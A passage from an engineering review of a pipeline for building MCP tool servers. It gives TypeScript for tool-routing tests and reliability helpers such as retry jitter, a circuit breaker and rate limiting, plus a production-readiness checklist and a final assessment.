        { role: 'system', content: testCase.systemPrompt },
        { role: 'user', content: testCase.message },
      ],
      tools: loadToolDefinitions(), // From compiled server
      tool_choice: 'auto',
    }),
  });

  const data = await response.json();
  const latencyMs = Math.round(performance.now() - start);
  const toolCall = data.choices?.[0]?.message?.tool_calls?.[0];
  const selectedTool = toolCall?.function?.name || null;

  return {
    correct: selectedTool === testCase.expectedTool,
    selectedTool,
    latencyMs,
  };
}
```
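A single routing call is a noisy signal; what should gate CI is aggregate accuracy across a fixture set. A sketch (hypothetical names) of a summarizer that could sit on top of `testToolRouting` results and fail the build below a threshold:

```typescript
// Hypothetical aggregator: summarizes routing results and gates on an accuracy threshold.
interface RoutingResult {
  expectedTool: string;
  selectedTool: string | null;
  latencyMs: number;
}

interface RoutingSummary {
  total: number;
  correct: number;
  accuracy: number;                     // 0..1
  p95LatencyMs: number;
  missesByTool: Record<string, number>; // expected tool -> miss count
}

function summarizeRouting(results: RoutingResult[], minAccuracy = 0.9): RoutingSummary {
  const correct = results.filter(r => r.selectedTool === r.expectedTool).length;
  const latencies = results.map(r => r.latencyMs).sort((a, b) => a - b);
  const p95Index = Math.min(latencies.length - 1, Math.ceil(latencies.length * 0.95) - 1);
  const missesByTool: Record<string, number> = {};
  for (const r of results) {
    if (r.selectedTool !== r.expectedTool) {
      missesByTool[r.expectedTool] = (missesByTool[r.expectedTool] ?? 0) + 1;
    }
  }
  const summary: RoutingSummary = {
    total: results.length,
    correct,
    accuracy: results.length ? correct / results.length : 0,
    p95LatencyMs: latencies[p95Index] ?? 0,
    missesByTool,
  };
  if (summary.accuracy < minAccuracy) {
    throw new Error(`Routing accuracy ${summary.accuracy.toFixed(2)} below ${minAccuracy}`);
  }
  return summary;
}
```

The `missesByTool` breakdown matters operationally: a 90% overall score can hide one tool that never routes correctly, which is exactly what a per-channel report should surface.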

### LOW: Add Monorepo Structure for Multi-Server Management

For managing 30+ servers, I recommend a workspace structure:

```
mcp-servers/
├── package.json          # Workspace root
├── turbo.json            # Turborepo config for parallel builds
├── shared/
│   ├── client/           # Shared API client base class
│   ├── logger/           # Shared logger
│   └── types/            # Shared TypeScript types
├── servers/
│   ├── calendly-mcp/
│   ├── mailchimp-mcp/
│   ├── zendesk-mcp/
│   └── ... (30+ servers)
└── scripts/
    ├── build-all.sh
    ├── health-check-all.sh
    └── update-deps.sh
```
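A minimal root `package.json` sketch for that layout, assuming npm workspaces plus Turborepo (versions and script names illustrative):

```json
{
  "name": "mcp-servers",
  "private": true,
  "workspaces": ["shared/*", "servers/*"],
  "scripts": {
    "build": "turbo run build",
    "test": "turbo run test",
    "health": "bash scripts/health-check-all.sh"
  },
  "devDependencies": {
    "turbo": "^2.0.0"
  }
}
```

The payoff of Turborepo here is cached, dependency-aware builds: touching one server rebuilds that server and the `shared/` packages it depends on, not all 30.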

## Operational Readiness Checklist (Must Exist Before Deploying to Production)

### Infrastructure (P0 — blocking)

- [ ] **Containerization:** Every server has a Dockerfile and can be built/deployed as a container
- [ ] **Process management:** PM2, systemd, or Kubernetes manifests for all servers (not manual `node dist/index.js`)
- [ ] **Health monitoring:** Centralized health dashboard that polls all servers every 60s
- [ ] **Alerting:** Circuit breaker trips → Slack/PagerDuty alert within 5 minutes
- [ ] **Log aggregation:** All server stderr → centralized logging (Loki, Datadog, or similar)
- [ ] **Secrets management:** API keys NOT in plaintext `.env` files — use an encrypted store or secrets manager
- [ ] **Resource limits:** Memory + CPU limits per server process (containers or cgroups)
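The health-monitoring item reduces to one small pure function, sketched here with assumed names: record the last successful poll per server, then report who has gone quiet.

```typescript
// Hypothetical helper for a centralized health dashboard: given the last time each
// server answered its health poll, report which servers are overdue.
function findUnhealthy(
  lastSeenMs: Record<string, number>, // server name -> last successful poll (epoch ms)
  nowMs: number,
  maxSilenceMs = 120_000, // two missed 60s polls before alerting
): string[] {
  return Object.entries(lastSeenMs)
    .filter(([, seen]) => nowMs - seen > maxSilenceMs)
    .map(([name]) => name)
    .sort();
}
```

In practice a `setInterval(poll, 60_000)` loop would hit each server's health endpoint, record timestamps on success, and feed `findUnhealthy`'s output to the alerting channel.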

### Code Quality (P0 — blocking)

- [ ] Circuit breaker race condition fixed (half-open mutex)
- [ ] Retry jitter added (prevent thundering herd)
- [ ] HTTP session TTL + max limit (prevent memory leak)
- [ ] OAuth token refresh mutex (prevent concurrent refresh)
- [ ] `postMessage` origin validation in all app templates
- [ ] CSP meta tag in all app templates
- [ ] String-based `escapeHtml` (not DOM-based)
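Two of these fixes are small enough to sketch inline (assumed shapes, not the factory's actual code): a full-jitter retry delay and a string-based `escapeHtml`.

```typescript
// Full jitter backoff: delay drawn uniformly from [0, base * 2^attempt), capped.
// Randomizing the whole window keeps retrying clients from synchronizing
// into a thundering herd when the API recovers.
function retryDelayMs(attempt: number, baseMs = 250, capMs = 30_000): number {
  const ceiling = Math.min(capMs, baseMs * 2 ** attempt);
  return Math.floor(Math.random() * ceiling);
}

// String-based escapeHtml: no DOM dependency, so it works identically in Node,
// workers, and the browser, and avoids innerHTML round-trip quirks.
function escapeHtml(input: string): string {
  return input
    .replace(/&/g, '&amp;')   // must run first, before entities are introduced
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
```

Note the ordering constraint in `escapeHtml`: escaping `&` last would double-escape the entities produced by the earlier replacements.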

### Testing (P0 — blocking)

- [ ] MCP Inspector passes for every server
- [ ] TypeScript compiles clean for every server
- [ ] axe-core score >90% for every app
- [ ] XSS test passes for every app
- [ ] At least 20 tool routing fixtures per server
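An illustrative fixture shape (tool names hypothetical, for a Calendly-style server); each fixture pairs a realistic user message with the tool the LLM is expected to select:

```typescript
// Hypothetical routing fixtures; real sets should include near-miss phrasings
// that must route to a DIFFERENT tool than the obvious keyword suggests.
interface RoutingFixture {
  message: string;
  expectedTool: string;
  tags?: string[]; // e.g. 'ambiguous', 'destructive', 'negative'
}

const routingFixtures: RoutingFixture[] = [
  { message: 'What meetings do I have this week?', expectedTool: 'list_events' },
  { message: 'Cancel my 3pm with Dana', expectedTool: 'cancel_event', tags: ['destructive'] },
  { message: 'Send Dana a link to book time with me', expectedTool: 'create_scheduling_link' },
];
```

Tagging destructive fixtures separately lets the harness demand 100% routing accuracy on deletes and cancels even if the overall threshold is lower.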

### Testing (P1 — should have)

- [ ] LLM-in-the-loop routing tests for critical channels
- [ ] Playwright visual regression baselines captured
- [ ] Load test: 10 concurrent users per HTTP server without degradation
- [ ] Chaos test: API-down scenario completes gracefully
- [ ] Smoke test script for post-deployment validation

### Operations (P1 — should have)

- [ ] Runbook: "API is down" — steps for each integrated API
- [ ] Runbook: "Server OOM" — diagnosis and restart procedure
- [ ] Runbook: "Wrong data rendered" — debugging data flow
- [ ] Dependency update cadence: monthly `npm audit` + quarterly SDK updates
- [ ] API version monitoring: quarterly check for deprecation notices
- [ ] Backup: LocalBosses localStorage thread data export capability

### Security (P0 for production, P1 for internal)

- [ ] No API keys in client-side code (HTML apps, browser-accessible JS)
- [ ] Tool descriptions reviewed for injection — no hidden instructions
- [ ] Audit logging for destructive operations (delete, update)
- [ ] Rate limiting on tool calls (max N calls per minute per user)
- [ ] Input sanitization on tool parameters that touch external systems
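Rate limiting at the tool-call layer can be a per-user token bucket. A minimal sketch with an injected clock so it is deterministic to test (names assumed):

```typescript
// Minimal per-user token bucket for the MCP layer (sketch, not production code).
class ToolCallLimiter {
  private buckets = new Map<string, { tokens: number; lastRefillMs: number }>();

  constructor(
    private maxPerMinute: number,
    private now: () => number = Date.now, // injectable clock for tests
  ) {}

  /** Returns true if the call is allowed, false if the user is over the limit. */
  allow(userId: string): boolean {
    const nowMs = this.now();
    const bucket =
      this.buckets.get(userId) ?? { tokens: this.maxPerMinute, lastRefillMs: nowMs };
    // Continuous refill: maxPerMinute tokens accrue evenly over each 60s window.
    const refill = ((nowMs - bucket.lastRefillMs) / 60_000) * this.maxPerMinute;
    bucket.tokens = Math.min(this.maxPerMinute, bucket.tokens + refill);
    bucket.lastRefillMs = nowMs;
    this.buckets.set(userId, bucket);
    if (bucket.tokens < 1) return false;
    bucket.tokens -= 1;
    return true;
  }
}
```

Continuous refill (rather than a fixed window reset) avoids the burst at window boundaries where a user gets 2N calls in a few seconds.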

## Final Assessment

### What's Excellent

The MCP Factory pipeline is architecturally sound. The 6-phase approach with quality gates, the comprehensive testing framework, and the attention to MCP spec compliance (2025-11-25) are all above-average for the industry. The API analyzer skill is particularly strong — the pagination catalog, tool description formula, and token budget awareness show deep expertise.

### What Would Break Under Load

  1. HTTP session memory leak (will OOM in days under moderate traffic)
  2. Circuit breaker allowing all requests through in half-open (can DDoS a recovering API)
  3. No retry jitter (thundering herd when API recovers)
  4. No process management (30 servers = 30 unmonitored Node processes)
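The half-open fix in item 2 amounts to a single-probe gate: after the cooldown, exactly one request may test the API while everyone else keeps getting rejected. A sketch of that design (assumed, not the factory's actual breaker):

```typescript
// Single-probe half-open circuit breaker (sketch). In single-threaded Node a
// boolean flag is a sufficient "mutex"; the original race is that every caller
// observing half-open was allowed through at once.
type BreakerState = 'closed' | 'open' | 'half-open';

class CircuitBreaker {
  private state: BreakerState = 'closed';
  private failures = 0;
  private openedAtMs = 0;
  private probeInFlight = false;

  constructor(
    private failureThreshold = 5,
    private cooldownMs = 30_000,
    private now: () => number = Date.now, // injectable clock for tests
  ) {}

  canRequest(): boolean {
    if (this.state === 'closed') return true;
    if (this.state === 'open' && this.now() - this.openedAtMs >= this.cooldownMs) {
      this.state = 'half-open';
    }
    if (this.state === 'half-open' && !this.probeInFlight) {
      this.probeInFlight = true; // claim the single probe slot
      return true;
    }
    return false; // open, or half-open with a probe already in flight
  }

  onSuccess(): void {
    this.state = 'closed';
    this.failures = 0;
    this.probeInFlight = false;
  }

  onFailure(): void {
    this.probeInFlight = false;
    this.failures += 1;
    if (this.state === 'half-open' || this.failures >= this.failureThreshold) {
      this.state = 'open';
      this.openedAtMs = this.now();
    }
  }
}
```

With this shape, a recovering API sees at most one request per cooldown window until a probe succeeds, instead of the full retry backlog.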

### What's Missing for Enterprise

  1. MCP Gateway/proxy layer (Microsoft, IBM, Envoy all provide this — needed for centralized auth, routing, observability)
  2. Container orchestration (Docker + K8s manifests)
  3. Centralized secrets management
  4. Audit trail for tool invocations
  5. Rate limiting at the MCP layer (not just API layer)
  6. LLM-in-the-loop testing (the most important test, yet the hardest)

### Recommendation

Fix the 4 critical code issues (circuit breaker, jitter, session leak, token mutex). Add Dockerfiles. Set up PM2 or equivalent. Then you can ship to production for internal use. For bank-grade production, add the MCP Gateway layer and secrets management.


Signed: Director Mei — "If the circuit breaker has a race condition, don't deploy it. Period."